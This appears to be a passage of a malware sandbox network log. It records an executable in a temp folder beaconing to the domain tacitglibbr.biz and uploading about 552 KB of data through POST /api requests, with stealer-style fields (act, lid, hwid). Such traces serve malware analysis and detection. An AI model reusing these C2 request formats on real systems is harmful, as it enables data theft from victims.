2024-12-16 10:04:41 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4g2lhogq9df08eldnb4v9joru0; expires=Fri, 11-Apr-2025 03:51:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8OK7YgTLSpxsG48ov3q9brloUAb4MIfv3AHUFv54qeXmLjqn%2FMZuVKhtCkl%2FJ6szeS2jWL93oZ7WAaAeSsiNF5vb%2B8bDxgP9LL6cL5wmHClCjY3QwjFVVdgDdKFQWCIlk%2BQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd9c31e6ec345-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1530&rtt_var=633&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21465&delivery_rate=1652518&cwnd=178&unsent_bytes=0&cid=c29c43cbb836b273&ts=1186&x=0"
2024-12-16 10:04:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-16 10:04:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50099	104.21.50.161	443	2876	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:41 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: tacitglibbr.biz
2024-12-16 10:04:41 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=1DB2EE5486F2277BAC8923850305D13E
2024-12-16 10:04:42 UTC	1010	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ek817kb73i9s411cbkj3ipa9kt; expires=Fri, 11-Apr-2025 03:51:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P95l4Fh%2BoLjsgEVauKG5niZHQWeMudgTJhg%2F3bxBBb99d0Vx1KfN7nEBkzWY61amIxu6HALpWXY94OFr8L7zwdwWWIkSikylxa42sj4XMj9UopQrFFXuHCYrCgVQHOIQNYw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd9c679fc430f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1599&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=981&delivery_rate=1771844&cwnd=214&unsent_bytes=0&cid=fa09f7d7013c2eb7&ts=1017&x=0"
2024-12-16 10:04:42 UTC	214	IN	Data Raw: 64 30 0d 0a 79 77 6e 43 68 53 50 45 4b 4f 39 4f 6d 52 4a 63 49 6f 6b 34 34 64 6b 49 6c 4c 77 61 2f 69 66 62 4b 72 32 49 69 6f 6c 59 75 35 36 51 63 75 44 77 41 66 34 4b 68 7a 72 74 59 6d 5a 2b 70 6d 54 4f 36 44 43 68 6b 69 6a 50 45 76 55 62 6a 4c 75 6b 75 47 37 6e 73 61 52 76 70 4e 6b 4d 6f 45 32 4a 59 50 78 71 4f 51 43 6c 47 6f 65 74 4b 71 36 4d 4e 74 78 43 2b 52 43 4e 39 61 62 79 65 73 36 38 38 53 75 71 38 56 65 30 45 72 4e 68 78 54 31 74 47 72 77 57 30 2b 67 39 75 6f 30 72 7a 51 6e 71 48 4f 47 6e 2b 66 30 39 32 76 4f 58 4a 72 44 6b 54 61 42 48 67 6d 44 38 61 6a 6b 41 70 52 71 48 72 53 71 75 6a 44 62 63 51 76 6b 51 6a 66 58 58 0d 0a Data Ascii: d0ywnChSPEKO9OmRJcIok44dkIlLwa/ifbKr2IiolYu56QcuDwAf4KhzrtYmZ+pmTO6DChkijPEvUbjLukuG7nsaRvpNkMoE2JYPxqOQClGoetKq6MNtxC+RCN9abyes688Suq8Ve0ErNhxT1tGrwW0+g9uo0rzQnqHOGn+f092vOXJrDkTaBHgmD8ajkApRqHrSqujDbcQvkQjfXX
2024-12-16 10:04:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50101	104.21.50.161	443	7480	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:43 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=H5B7D0TOB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1285 Host: tacitglibbr.biz
2024-12-16 10:04:43 UTC	1285	OUT	Data Raw: 2d 2d 48 35 42 37 44 30 54 4f 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 35 42 37 44 30 54 4f 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 35 42 37 44 30 54 4f 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 48 35 42 37 44 30 54 4f 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 Data Ascii: --H5B7D0TOBContent-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--H5B7D0TOBContent-Disposition: form-data; name="pid"1--H5B7D0TOBContent-Disposition: form-data; name="lid"PsFKDg--pablo--H5B7D0TOBContent-Disp
2024-12-16 10:04:44 UTC	1015	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ov35bi0tmpgobp6mllv0v20i4k; expires=Fri, 11-Apr-2025 03:51:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Ml0rDwpg1xzkMR5cOUBUpLzqeEe1SgCpasR8tTT0BsoW7KMe38WzfC3V7%2Bl2r7%2F8K11GFqih1Lqf4v9STuu2vknHkFlw%2FgrSrBPzsHiK6AndAc%2FcpVcCQPsKlpUoQkvC7o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd9d47ce472b7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=1997&rtt_var=893&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2192&delivery_rate=1134862&cwnd=192&unsent_bytes=0&cid=db97935a757af952&ts=1056&x=0"
2024-12-16 10:04:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-16 10:04:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50105	104.21.50.161	443	7480	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:45 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FUGY8DYMGGQD8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 552700 Host: tacitglibbr.biz
2024-12-16 10:04:45 UTC	15331	OUT	Data Raw: 2d 2d 46 55 47 59 38 44 59 4d 47 47 51 44 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 55 47 59 38 44 59 4d 47 47 51 44 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 55 47 59 38 44 59 4d 47 47 51 44 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 46 55 47 59 38 44 59 4d 47 47 51 Data Ascii: --FUGY8DYMGGQD8Content-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--FUGY8DYMGGQD8Content-Disposition: form-data; name="pid"1--FUGY8DYMGGQD8Content-Disposition: form-data; name="lid"PsFKDg--pablo--FUGY8DYMGGQ
2024-12-16 10:04:45 UTC	15331	OUT	Data Raw: 1e 3a 78 d3 b7 31 bc 66 9a 02 f0 f9 2d 5f f0 27 cb 9d f5 06 a6 6c 6a 31 d7 d6 1f 86 cf 4a f5 37 49 ad bc 9b 6a 96 1b fb 66 40 52 9a c1 7d 29 d4 50 84 b7 84 16 3f f4 5a 68 fe 53 db 3f 86 b1 c6 c8 58 d5 e4 20 0c b2 7c 4e 66 12 d2 03 21 c9 ad 39 6d d7 f8 44 d1 fd 86 c6 0f 8d df 87 4c 46 91 95 ef 39 d8 42 79 06 08 75 85 af 46 2d 43 be c4 f8 84 a0 b9 d5 c2 55 f7 12 68 ca b9 e0 a9 e5 1f fa cc 1b 0d 4d 33 e8 1a 7c ae 27 74 57 fd 07 be 2f f6 98 52 31 2e 2d 3c a0 c4 de 43 50 20 58 0a bf 79 6d d2 3a 51 80 b2 34 a9 f6 3d 29 2c ea c2 56 74 f0 89 c8 fd 74 af 3f 64 ca da da 5c 50 a1 2b 38 32 b8 aa c8 e8 bb 63 8f 04 c7 91 e4 c3 38 ff 44 c8 dd 01 d4 92 9b 21 38 88 3b 26 31 4a f1 67 6f 28 01 da 11 14 ec e3 16 fe ce 6f bc f2 a9 26 38 21 b1 f5 d2 67 2c d9 a1 e5 93 0e 28 1e Data Ascii: :x1f-_'lj1J7Ijf@R})P?ZhS?X \|Nf!9mDLF9ByuF-CUhM3\|'tW/R1.-<CP Xym:Q4=),Vtt?d\P+82c8D!8;&1Jgo(o&8!g,(
2024-12-16 10:04:45 UTC	15331	OUT	Data Raw: 56 58 02 55 9b 6f 98 8e 4b 4b 25 9e 08 73 de f3 4c b8 35 4b c3 3b 3b b6 ee 59 7a 4c 1d 65 40 d2 db 8b ab a2 24 74 ed 38 39 11 f5 56 b2 30 10 fd 69 98 12 17 1d 47 c1 ed 6e 43 dd b9 2d ea 13 ca 27 e6 91 22 e3 10 e1 66 73 02 2b 0c f1 fd 69 5c 70 45 b8 11 e5 9f 38 87 78 19 a0 a4 5c ca bf 50 db 11 8c d0 17 9c ad cd 60 48 6c ad ea 1b cf 28 fd 1e ad 32 1e ab ad 50 9e ea 4d 50 c1 67 c7 45 60 4a b7 dd da 88 f5 cc 4a 76 c6 60 d6 b7 82 54 53 85 b9 45 c1 23 2d 91 2c f7 85 df 38 e1 23 91 96 76 13 39 15 6d da 71 6b 9c 26 96 7b 41 d3 0c df 5c f3 b8 f1 d5 3b e1 a1 cd f5 23 eb be a6 b4 00 d1 36 b9 d4 88 3b bd ab 5a e4 af be c4 36 c3 8e 70 59 e6 b9 9a 3c 44 3b 6e 42 32 53 da 47 b0 fa 54 5b 16 ba 2b 24 7e c6 01 60 08 09 1f 85 e3 61 32 e6 e8 4b 1b dd 5c 1a 94 fc ee 8e a4 d4 Data Ascii: VXUoKK%sL5K;;YzLe@$t89V0iGnC-'"fs+i\pE8x\P`Hl(2PMPgE`JJv`TSE#-,8#v9mqk&{A\;#6;Z6pY<D;nB2SGT[+$~`a2K\
2024-12-16 10:04:45 UTC	15331	OUT	Data Raw: 8c ff 7b 67 2b c4 d0 8b 0e ea 7b 3e c7 ff 23 84 d0 01 e6 d4 91 9f 51 d8 2a c0 83 73 78 3b 0c e0 dd 39 e4 b1 74 67 72 f6 ff 3d 3b fc 14 e8 3a 83 b4 60 18 b9 69 40 ef 4e bf 0a ac dd f1 0d ed 7c 20 7e d6 bb 43 a7 2f d2 ad 58 ec e5 ab f4 80 16 0b 34 f9 1f d8 43 38 4e 02 de e3 12 56 aa 0a a4 ce 8b 32 3a ff 3c a1 33 b6 0f c3 8e 04 9b 62 9c df 69 9b 26 3c e0 e1 43 99 46 ea e4 fa e1 08 ea 7f 7f fc a6 14 ce ff 93 13 21 c6 77 33 c9 0c 76 08 04 82 64 c6 af 40 55 46 59 29 3d e9 06 a9 02 35 7d 91 fa 4d 80 91 2e 21 8e 86 93 1f c7 11 38 d1 25 62 2b bf ad c2 8f 7a f4 f1 7e c5 39 52 1b 77 35 e3 f7 34 2b af d4 69 65 29 26 8e 24 b9 a4 a3 c3 fb 4c 0f 56 a2 d9 d9 f8 b5 15 c7 35 61 81 dd 82 f9 05 64 3d ac 78 c7 cf 31 70 a4 99 a2 88 50 2d f6 4f 5a f5 b3 75 b9 c1 2c d5 3a 70 3f Data Ascii: {g+{>#Q*sx;9tgr=;:`i@N\| ~C/X4C8NV2:<3bi&<CF!w3vd@UFY)=5}M.!8%b+z~9Rw54+ie)&$LV5ad=x1pP-OZu,:p?
2024-12-16 10:04:45 UTC	15331	OUT	Data Raw: b2 5a 33 39 7b 89 5c b5 e9 b7 a6 8f c7 4f 1c e7 bc 3b 3f c7 27 85 3f 80 a7 23 78 95 85 73 7d 1b de 1c 76 23 0d c9 49 7c ec 86 78 d3 64 a6 d1 07 85 ba ea c5 91 ce 8a 40 c9 df 67 94 19 0a 22 af 00 1d cf f1 d3 ce 8c 0e eb d0 f0 80 90 97 1c 13 82 38 de 40 89 89 2d be 41 46 91 43 71 2c 61 bf 9d 71 04 f2 63 c7 e5 ed 8e 11 93 0a 0c 64 85 f6 ed 39 c7 72 3f 75 c2 4b 4c 47 6c fb e7 f2 49 4d cc 7d b9 d0 3b ff 4e 27 b9 cf cc 90 d2 d6 24 37 13 bd f1 fb c0 b9 0f 4e 4d c6 9d 07 c1 cb c3 49 9e 7c 9c a5 3e 58 5b fb 34 a2 15 71 4d 21 d8 30 ed 8b 72 7f 37 84 68 71 4e 1d 1f 54 0c bd fc ef 2d a8 c2 c2 e7 e2 42 d6 59 97 40 5c 29 c4 20 c0 5f 03 31 96 10 48 9d 63 14 da 64 5e 90 d0 35 fa 01 65 d6 7e 98 d9 1c 45 91 b7 3e b6 3f 9e 69 c9 45 98 fb 8b 76 25 8b f1 8c c7 f7 3d 46 7c 87 Data Ascii: Z39{\O;?'?#xs}v#I\|xd@g"8@-AFCq,aqcd9r?uKLGlIM};N'$7NMI\|>X[4qM!0r7hqNT-BY@\) _1Hcd^5e~E>?iEv%=F\|
2024-12-16 10:04:45 UTC	15331	OUT	Data Raw: 60 da d6 5b ea 40 aa 9b 40 0a 75 68 a3 09 0d 0f 73 42 dc ce e6 af 73 66 ab 13 4a 8d d8 dd 52 a8 57 1a ac 76 ec 44 0f ac 68 d5 03 af 19 fe be 42 c2 11 c0 02 6b f9 0f 81 f5 05 7e 4d 7e 70 04 51 48 01 3a 6d 0b fc 39 19 b5 24 6d 4e 0c 2b a3 82 2b 06 aa de 79 fb ac 0c 7d 56 db 9a 67 8f fd e7 ad c0 11 06 ce 61 67 b0 20 96 17 68 2e b4 30 f9 8b ff 1c c7 a1 78 5e 68 d9 7d 8e 19 b2 ff 2a a4 5b 23 9d 32 2d a8 12 15 d1 9b bd 19 21 af 8a 90 66 d6 37 9f 24 47 4c 99 0b be ab d0 34 19 d0 f1 28 89 3c 44 5e f3 ec d0 9b ff 50 70 c0 c4 ef 37 ce 48 0f 2b 01 54 b0 51 a6 00 be 62 ad 8e 86 62 31 60 eb a9 b4 8e 0a c8 25 f8 da 69 42 1f 69 70 eb 65 88 61 29 b7 13 27 c2 60 a6 78 d7 ed 99 17 e3 a9 9b d1 f0 49 90 4c 50 f7 e1 c9 8c 20 87 98 b9 2a 0e 33 e2 31 b1 1d c7 be e4 1d a9 be 71 Data Ascii: `[@@uhsBsfJRWvDhBk~M~pQH:m9$mN++y}Vgag h.0x^h}[#2-!f7$GL4(<D^Pp7H+TQbb1`%iBipea)'`xILP 31q
2024-12-16 10:04:45 UTC	15331	OUT	Data Raw: 59 b1 d6 f5 33 e7 88 0a cf c8 f9 b8 63 db 2d 1e 6b e5 09 fc 19 ed 32 55 85 2e ff b7 0f cd 88 d1 b0 1c ff 55 9c 56 2d 21 e3 0f 9f df e9 5a c0 56 95 40 75 e1 9e 04 6a fd 38 61 93 79 34 ea bd b8 d6 38 f8 96 7a 22 2d 44 22 53 79 02 61 c7 a4 d8 87 ff e1 cb 53 64 91 10 ec 93 e7 ca 7e f7 07 37 df cb af 99 b5 d3 e6 e9 73 d3 2a 4b 30 62 87 e1 5e 4f be 93 14 71 74 52 0b 45 bb b7 d5 26 36 1a f6 1b 7d 53 af 39 de 9b 9d dd 56 02 59 3b 88 f0 53 f8 37 24 f0 57 1d 62 ff 0c 12 a5 60 3c e2 6d 4b db 21 9c 9a c2 c9 4b 0d ef 8c 51 5d 65 45 f7 14 72 12 35 c7 39 ae 2f 93 f0 56 f7 48 b3 86 7e d8 eb e7 64 68 89 de 09 70 5b 29 4b 60 aa 73 aa c0 1f b5 b7 cc 75 d0 a6 c5 24 cf bc dd 00 21 09 de 06 27 2e 23 2f ee 7b 51 98 08 e3 49 56 2e e9 e8 60 f8 96 0a 33 c7 87 5c 79 34 56 d9 91 da Data Ascii: Y3c-k2U.UV-!ZV@uj8ay48z"-D"SyaSd~7s*K0b^OqtRE&6}S9VY;S7$Wb`<mK!KQ]eEr59/VH~dhp[)K`su$!'.#/{QIV.`3\y4V
2024-12-16 10:04:45 UTC	15331	OUT	Data Raw: b6 41 79 90 a7 11 ac f1 d6 58 7d 56 89 50 82 84 7f 21 eb 5f 5c 4f aa 56 42 63 9b dd db c5 ca f7 9e 73 48 af c4 f8 06 12 c8 84 86 32 2d 0a f6 d2 0d c2 40 8c b6 21 5e a8 61 c4 38 c4 b7 c3 fd e2 43 ec a5 3a 03 79 7c 31 ea 4a 3a e1 ee 61 b3 16 ef 4b 0f 08 99 4e 7e ec df 74 cb ec 1a e0 17 45 d5 fe f7 64 bc 38 38 24 f9 68 b7 df a0 70 31 70 77 7c ab 08 66 e5 10 13 a4 fc 00 8e 2f fa d4 17 75 da e9 e3 a4 af 34 67 4d 51 fa 52 63 74 13 12 35 90 56 0c 0a 87 f8 10 01 8a 50 6b 4f bf 45 b8 a1 f5 6a 8b a5 d4 39 5d 7c 7b 04 2d c0 bb 50 02 3c 85 89 ef 2e 08 93 72 1f 61 17 83 d6 fa 8f c4 18 fa 83 9d 29 91 be e7 4d 18 85 ef 52 97 ac 76 0e ca 17 1d 6e 40 90 9e a0 61 29 84 98 cc db 13 5a 3f a5 3c ce eb af 42 36 ac 8f 98 c0 0c a7 c9 98 d3 c1 cd 42 e9 d3 6d 19 b3 5c af a7 bc b2 Data Ascii: AyX}VP!_\OVBcsH2-@!^a8C:y\|1J:aKN~tEd88$hp1pw\|f/u4gMQRct5VPkOEj9]\|{-P<.ra)MRvn@a)Z?<B6Bm\
2024-12-16 10:04:45 UTC	15331	OUT	Data Raw: 02 32 58 89 0a d3 1e e4 07 d1 4c 95 3b b5 b4 60 e6 23 1c 7e 52 a5 dd 7e a1 1a 55 56 cf 5a 0c e6 e7 21 f1 10 92 bd 47 41 98 61 ad 9f fb 82 e8 87 fa ad 32 f4 c3 7b 38 93 22 8e a7 76 5a 7b 0b 5c e4 c8 66 e3 89 78 85 01 d6 58 50 81 97 59 4c 5c f4 ad 0a eb 2e d5 c1 56 f8 f7 8a f8 be d8 0d b1 9b dd 2c 55 de a0 4a b5 e8 ef 4d 66 dc e6 fc 87 d6 63 c3 0f dd a3 42 9c 08 f5 fb fb 47 94 56 99 ca e1 09 21 6a 21 43 65 51 08 fa ee f4 f8 30 50 16 c6 f7 02 5e 93 9e e3 a7 3d 58 5e ff 35 0c 9b ff f6 2e ef 02 b8 89 d4 9f c7 85 c0 b1 f7 f6 66 c4 e7 c5 48 f7 a6 0f 15 86 bf 6b e2 05 0a be 65 33 26 0e 17 8c 72 c3 27 0f e8 51 27 c7 3c 8e 3f a9 25 03 3d b1 69 80 70 bf 54 50 06 15 54 54 63 e9 51 c8 02 68 21 33 b9 0b a0 b4 fb f1 f5 ba b0 ff 43 77 a6 fa 8f d8 7c be ab d1 4e 3f 0a 0e Data Ascii: 2XL;`#~R~UVZ!GAa2{8"vZ{\fxXPYL\.V,UJMfcBGV!j!CeQ0P^=X^5.fHke3&r'Q'<?%=ipTPTTcQh!3Cw\|N?
2024-12-16 10:04:45 UTC	15331	OUT	Data Raw: 04 f3 c9 b1 34 7c 8a 8f 8b 83 b8 ec d5 a6 c2 0c bd f8 10 fe 43 5c 0c 4a 16 52 5f 10 2b 92 35 8e 98 4b e1 25 54 7e 9a c4 bf 69 91 ac 37 0a 22 b4 4a c3 7b 1f ae b9 26 98 4a 81 5e 93 0a 94 46 88 83 6c 04 a1 f7 e6 1e 56 72 eb 8f 4f a9 16 c6 07 d6 a7 1e 25 e1 35 84 db df e1 81 71 d2 e6 f9 09 fe fb e4 8f 3c 1b 50 7d a0 45 e0 7d a1 4e a8 f7 bc e2 a5 af 71 91 74 5b e6 42 84 fb c0 84 a9 de e7 60 9a 26 ba c6 c8 b8 4b 17 84 ce ff 9c ce 30 1a 88 fa a4 cd 71 1d 6f 59 b7 69 d9 ec e0 1b 8d 69 15 44 f8 f4 90 7e e0 02 ef 5f 33 7e bd 85 68 6c 42 7f 2c 61 b3 a8 72 a2 de 7d 20 99 37 23 ce fa d5 93 5c f9 66 70 f3 79 e5 fa 80 4d 39 ed 26 eb d7 9c 42 01 6d 91 15 c4 3d 27 0a d1 16 87 08 01 a4 cc b0 0f 95 9b 05 63 ae 3e 8c 10 ee 50 b3 78 50 35 36 a2 7a 05 4f 1d d8 30 66 6f 24 08 Data Ascii: 4\|C\JR_+5K%T~i7"J{&J^FlVrO%5q<P}E}Nqt[B`&K0qoYiiD~_3~hlB,ar} 7#\fpyM9&Bm='c>PxP56zO0fo$
2024-12-16 10:04:48 UTC	1019	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8indsla7tu7r62vvj77sibp2cf; expires=Fri, 11-Apr-2025 03:51:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKy%2BwM2S0hOhRCba4HfgyLrC5lrw9vZE8wGvlU7tMqwUnbk5BciVBfzYVTHlST7ZRZ%2FyjBfz1t44ZkAKp%2FLCaulOLwURh8ouHwlu2jzNHP6H3xD4yPWroqbYorXxR6dOvwY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd9e41a194364-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2054&min_rtt=2045&rtt_var=786&sent=319&recv=574&lost=0&retrans=0&sent_bytes=2839&recv_bytes=555197&delivery_rate=1376709&cwnd=206&unsent_bytes=0&cid=625813675181d126&ts=3072&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50109	104.21.50.161	443	7480	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:50 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: tacitglibbr.biz
2024-12-16 10:04:50 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=1DB2EE5486F2277BAC8923850305D13E
2024-12-16 10:04:51 UTC	1016	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bc6fiu0ngt1v6hjnb4k67bcmas; expires=Fri, 11-Apr-2025 03:51:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NzxOmgnHWmlM6ffh3ZNRLaPGt6sCnQjFPnF9zSDPYdv%2BuSVXJwU3kGQ6mIgXe3DF%2FGNW1EnDbM%2FFMVPnLuwjz70UGhbk2NR%2BbpamEChWljsmt479ovebU%2FFc5usEut9yJaM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dda00c8421821-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1474&rtt_var=574&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=981&delivery_rate=1869398&cwnd=242&unsent_bytes=0&cid=6ff1cab637eead0f&ts=1131&x=0"
2024-12-16 10:04:51 UTC	214	IN	Data Raw: 64 30 0d 0a 30 41 4a 65 66 69 70 34 48 57 44 64 74 6e 31 73 59 47 71 63 61 47 4d 59 34 61 57 6e 34 32 50 4f 63 76 36 78 38 74 4e 77 4e 4e 65 4c 65 58 77 4c 43 45 49 2f 43 4b 6e 43 44 56 59 38 52 63 42 48 55 69 44 55 69 35 58 53 56 75 42 44 7a 34 4c 63 34 6b 5a 6f 2b 4c 39 6b 4f 43 49 46 48 48 67 47 38 39 4d 46 43 55 4a 47 76 67 34 58 4f 74 75 56 69 38 45 47 37 45 6a 4f 7a 4e 36 6f 55 6b 48 31 36 69 41 32 43 6c 34 49 4a 7a 7a 79 36 6c 4a 64 57 46 2b 79 57 6c 49 74 7a 35 53 57 30 45 33 2f 52 4b 4b 65 67 61 63 56 56 62 71 4d 4c 53 77 66 52 42 78 79 44 66 50 54 42 51 6c 43 52 72 34 4f 46 7a 72 62 6c 59 76 42 42 75 78 49 7a 73 79 76 0d 0a Data Ascii: 